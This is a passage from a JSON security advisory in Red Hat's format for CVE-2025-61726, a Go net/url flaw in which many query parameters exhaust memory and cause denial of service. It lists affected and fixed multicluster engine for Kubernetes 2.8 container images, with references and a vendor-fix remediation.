"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434432"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: net/url: Memory exhaustion in query parameter parsing in net/url",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker must be able to send a specially crafted HTTP request to an application parsing URL-encoded forms with net/url, specifically a request containing a large number of unique query parameters. The request will cause the application to consume an excessive amount of memory and eventually result in a denial of service, with no impact to confidentiality or integrity. Due to this reason, this vulnerability has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64"
],
"known_not_affected": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "RHBZ#2434432",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434432"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61726",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61726"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://go.dev/cl/736712",
"url": "https://go.dev/cl/736712"
},
{
"category": "external",
"summary": "https://go.dev/issue/77101",
"url": "https://go.dev/issue/77101"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4341",
"url": "https://pkg.go.dev/vuln/GO-2026-4341"
}
],
"release_date": "2026-01-28T19:30:31.215000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-15T01:45:31+00:00",
"details": "For multicluster engine for Kubernetes, see the following documentation for\ndetails on how to install the images:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.13/html/clusters/cluster_mce_overview#mce-install-intro",
"product_ids": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
